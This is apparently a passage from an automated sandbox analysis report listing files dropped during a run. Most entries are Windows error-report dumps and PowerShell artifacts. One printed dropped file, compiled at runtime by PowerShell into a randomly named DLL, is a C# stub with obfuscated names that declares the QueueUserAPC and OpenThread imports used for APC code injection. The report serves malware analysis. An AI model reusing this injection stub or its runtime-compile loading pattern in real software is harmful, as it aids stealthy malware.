                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.5.2.<./.P.i.d.>.......

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERE06B.tmp.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4659
                          Entropy (8bit):4.424687359057914
                          Encrypted:false
                          SSDEEP:48:cvIwSD8zsuJgtWI9CcWgc8sqYjy8fm8M4J2+4FA+q8vQ+WKcQIcQw0ld:uITfkFVgrsqYjJzKKKkw0ld
                          MD5:13514E4971D5EAF338B2584EC9131379
                          SHA1:7BA320D9BB21969CAFB4DFCC418DBE16A4D2171A
                          SHA-256:5C78050C06F40345D01FE32AFBD71A7573387E87632E16BB9D2402CE82FEEE79
                          SHA-512:8A6FAB012137E08868815004F5014C98C09AF4C60A27C711EA46CF08E1C6B211A63C0AF340D16900270A2D808F4C5EC84B06BEFE2B513B0CFDDC33997C60582C
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1531936" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERE904.tmp.dmp

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Thu May 26 11:06:15 2022, 0x1205a4 type
                          Category:dropped
                          Size (bytes):37322
                          Entropy (8bit):1.8947302696079928
                          Encrypted:false
                          SSDEEP:96:5C8oi8M/G+5l/1oi7SfCgFR2iBCMelJ5t4uzDAKqBTsFWInWIBgI4jJT9p3LqWct:j3G+DCOSvClPaumXjd9p7qWcODKiPfpY
                          MD5:2BF1A1E91B53E5CD417B1E9239325FD8
                          SHA1:48135C24AEF60723F4DA16198D7BC2F8E96B073C
                          SHA-256:8052C42F618E22A1BEBBD651DCEB232C60F478491F597D2B80F71A408737CAE7
                          SHA-512:453D84AA1DBA1BBDD396516840E3BBC69E69BFB097F5E4802A5A662D8D59F7153190E362D7210C8903A7BD283AF85B02378AD5A37E1163AB62EDF07B2A6F3ED5
                          Malicious:false
                          Preview:MDMP....... .......'_.b........................L...........$...............~!..........`.......8...........T............................................................................................................U...........B..............GenuineIntelW...........T............_.b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB38.tmp.WERInternalMetadata.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8334
                          Entropy (8bit):3.702395314492602
                          Encrypted:false
                          SSDEEP:192:Rrl7r3GLNiAL6bf606YWSSUonwgmffSt9Cpru89bbmsfApm:RrlsNi86O06YjSUonwgmffSQbFfT
                          MD5:77967BF18A4A34A14AC3777AA82FD989
                          SHA1:BF228D629051EE5147FB5CCF51AEF9D049A24040
                          SHA-256:23DBFD3DEE2D8567F2FFE2A7C4507AC4E7AF590D58BD6E557EBD77F2FB4018D2
                          SHA-512:14C636839BA38A23A370599C9FCC4587C8F8E4365C9D6314CDB89AEFEC069FBD1AA489102FA05167529ED84CE21F24DDC4D2565F2BE0F1A64907E62AAEE8D7DD
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.5.2.<./.P.i.d.>.......

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERECBF.tmp.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4598
                          Entropy (8bit):4.47471576307433
                          Encrypted:false
                          SSDEEP:48:cvIwSD8zsuJgtWI9CcWgc8sqYje8fm8M4J2+cZFe+q849BrKcQIcQw0kd:uITfkFVgrsqY3J+C3rKkw0kd
                          MD5:54C03D70B220D32B86E7ADD1E89E9F2E
                          SHA1:E689CB03167A07E8B6B3A9BBA353FBD971149EEE
                          SHA-256:B1E454C2508E67F574BC23B5F9C278333276492C342872A87AC6A55C2E2D96AF
                          SHA-512:6919BC738AB85FE52B1E95CF19ADB11A70FB1867370D553985F57653CF7F9FB32FFF3A77EEEB8B0E52F327C2F65AFBFC5D22CB159CF19F490F9E8AFA0880B644
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1531936" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB73.tmp.dmp

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Thu May 26 11:06:20 2022, 0x1205a4 type
                          Category:dropped
                          Size (bytes):50326
                          Entropy (8bit):2.125946543056507
                          Encrypted:false
                          SSDEEP:192:IpH+L4OSAmpgaeTlcrl76oH72ElMckKTA4squIZjdC5PIKHDDEAKkPsy:h/SAmpgaeE5lMckCyquI505Psy
                          MD5:CA250C408A43688CEFB9F3397FA729EB
                          SHA1:8FAE67C648415ED7E61441FBE291B1F08C7D84BE
                          SHA-256:E8DA5CF423A1B30352B81E352EE8DB57725A63D96108646467D25B09E19A5F76
                          SHA-512:24515C4D1D0CF8600A17480087A9C1A32510E15816FD97DB6CB72203EA557E7C23F21E2B8DAAC29AF19894000A6A4E8F621A8651F44CA44494280C363471B44D
                          Malicious:false
                          Preview:MDMP....... .......,_.b........................L...........$...............~!..........`.......8...........T............................................................................................................U...........B..............GenuineIntelW...........T............_.b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERFDC6.tmp.WERInternalMetadata.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8290
                          Entropy (8bit):3.696150034621855
                          Encrypted:false
                          SSDEEP:192:Rrl7r3GLNiAH6bef6YWdSU5OqgmfYSZ9CpDl89bFmsf6Xm:RrlsNio6Cf6Y8SU5OqgmfYSZFFfT
                          MD5:E2C283F6E9C9F27B1B6E7F14D88094C9
                          SHA1:680DF4EF66AE32C292A14A8F17BBE7A6A5597DDC
                          SHA-256:6F86ACD2083CFDCD45A58DF4638BD3E640559A18B9ABC8D8C96A4F4CA1B70349
                          SHA-512:B93CB9B980FFB36425E5A71CF7F5D269EF0FC95A319B78D5F3DEEC7BE33BD2B91C515DC7BADCBEF55056AFCDBAA8098F1DF8EEAA14E6E01AE5CCD41375A1D8C6
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.5.2.<./.P.i.d.>.......

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERFEF0.tmp.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4558
                          Entropy (8bit):4.434078780575867
                          Encrypted:false
                          SSDEEP:48:cvIwSD8zsuJgtWI9CcWgc8sqYjk8fm8M4J2+7F/gh+q84ARKcQIcQw0kd:uITfkFVgrsqYtJnOwKkw0kd
                          MD5:AD092981409016DC61C4616952F5AEE9
                          SHA1:758103A72993DEF8378E720B580EF3C9ACECEB18
                          SHA-256:75207810F0A20613C0A11661346A5546D1A1F6A803969A52A40BB8BBDB1DF012
                          SHA-512:96D960E15081E3AC1503A287CD4FD581A7D43E72056FE946EB84E1744A3698653FD146CD60003C1BBE434D45D1EDD51B21C5FFE2018D876E17C52B918150F91C
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1531936" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):11606
                          Entropy (8bit):4.883977562702998
                          Encrypted:false
                          SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                          MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                          SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                          SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                          SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                          Malicious:false
                          Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                          C:\Users\user\AppData\Local\Temp\CSC72CD5E3A7BFC47C08453C5B847B47E88.TMP

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.0931050765106587
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryfVak7YnqqiaPN5Dlq5J:+RI+ycuZhNNVakSiaPNnqX
                          MD5:02C3662D4C9E197ADEB1CC2C6BEF46F5
                          SHA1:6D53EC3C48A5D1F25B32D59AF0A15740CD65E193
                          SHA-256:F951EA74829FCE379D430EA52C6E67402CAAFF04DF0906D7EDB4B76ABB963562
                          SHA-512:B8B6BF53159D147A25FFBDA73400B6119FAD651F0E32F7C2A8A9220D4B6EA7121B1AE8B481CC2E5AC98E8BC3F9094744D8A29DC45866E6035FC8E1BD10ACCF93
                          Malicious:false
                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...k.i.k.z.s.l.f.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...k.i.k.z.s.l.f.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                          C:\Users\user\AppData\Local\Temp\CSC7CF5F35C720441118B71E863AB44B87A.TMP

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.1133483598409657
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBak7YnqqFPN5Dlq5J:+RI+ycuZhNjakSFPNnqX
                          MD5:9539704CDC4933899E44EEFA3C61D608
                          SHA1:CA3ABD82D814B1679ED449248896A5BABBA9DAF4
                          SHA-256:7E05C7E8A8EE0D2E2C90BF4126DD2714DF469CD920B9832C55B58EC9B6E6B4AE
                          SHA-512:7A390EC42F2509B75B40C31CE05F239096555CF51B45693482675B7B18B46359F9707DD959CD8750BF3588EA4A7114981C54145AC517265082ECAFEE39CAC0C4
                          Malicious:false
                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.5.k.h.t.o.p.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.5.k.h.t.o.p.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                          C:\Users\user\AppData\Local\Temp\RESE691.tmp

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
                          Category:dropped
                          Size (bytes):1320
                          Entropy (8bit):3.9822378198203157
                          Encrypted:false
                          SSDEEP:24:HR3nW9rtjHQTKhHvYhKdNWI+ycuZhNjakSFPNnq9hgd:JWxQaPaKd41ulja3fq9y
                          MD5:09B3C60D2220594D5764CF805341CC0E
                          SHA1:555EEEB4FCC58F515C25005F000D88686B04AD32
                          SHA-256:3EFC57A094F328BBEA3EB475295462DA3C26FB3F3FED6AB0EB25D35F263150A3
                          SHA-512:C30E50256D1C37B63EAF9EE1C2379EAD807A4BBA2173D8444640EDFBF553D3784E1F75A5E6AF57719B6088E6BB562D50B1F21C592484BAEEA0C333ED93643D0B
                          Malicious:false
                          Preview:L...__.b.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSC7CF5F35C720441118B71E863AB44B87A.TMP.................9pL.I3..D..<a............4.......C:\Users\user\AppData\Local\Temp\RESE691.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.5.k.h.t.o.p.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

                          C:\Users\user\AppData\Local\Temp\RESFE5F.tmp

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
                          Category:dropped
                          Size (bytes):1320
                          Entropy (8bit):3.9747905175308915
                          Encrypted:false
                          SSDEEP:24:H/nW9r00ehHnfhKdNWI+ycuZhNNVakSiaPNnq9hgd:vW00iH5Kd41ulNVa3iWq9y
                          MD5:72B817498A9CB15C74DD2FA541EC0561
                          SHA1:7E91DCA4483F6E04A51ADC829DA393235EBD810A
                          SHA-256:779F0A35D8986CABDE9796A33471BAC978357938416782ECDB889D7A99FE3373
                          SHA-512:B007342425DCA6B16FFED7589285344882DFB6F2CFB1A4808F3F7131605316DC5ADE93426A7AEA4052E2F030018F7A78672F5DF83F72EF86D86A8963AE936148
                          Malicious:false
                          Preview:L...e_.b.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSC72CD5E3A7BFC47C08453C5B847B47E88.TMP..................f-L..z..,k.F...........4.......C:\Users\user\AppData\Local\Temp\RESFE5F.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...k.i.k.z.s.l.f.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cuvyoqr5.itk.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ohnz5k1g.zqm.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\b5khtopv.0.cs

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):403
                          Entropy (8bit):5.058106976759534
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                          MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                          SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                          SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                          SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                          Malicious:false
                          Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.

                          C:\Users\user\AppData\Local\Temp\b5khtopv.cmdline

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):351
                          Entropy (8bit):5.267478878877476
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fxzxs7+AEszIWXp+N23fAx:p37Lvkmb6KHZWZE8E
                          MD5:F09794D488DBC35AA92B8C90362AB28B
                          SHA1:AFFAAEE2DBD7D8C475CEEBB8815C8614545FEEC4
                          SHA-256:3AAF9335F5405A242AA66C1A9CEE285868C0727DC4A61E05AC0FE7113AC7685E
                          SHA-512:F9474796B81FD1A7A2D5FBE9F862BBEA8C8B5DF20F74113A621D38A38BCECC9018BEC80A488C504AF49CA8346A478CE8B445700206666BE1E7C25C7D03D01876
                          Malicious:false
                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\b5khtopv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\b5khtopv.0.cs"

                          C:\Users\user\AppData\Local\Temp\b5khtopv.dll

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):3584
                          Entropy (8bit):2.6227922787586184
                          Encrypted:false
                          SSDEEP:24:etGSQ8OmU0t3lm85xWAseO4zKQ64pfUPtkZfvk1jVUWI+ycuZhNjakSFPNnq:6qXQ3r5xNORQfUuJvk1x31ulja3fq
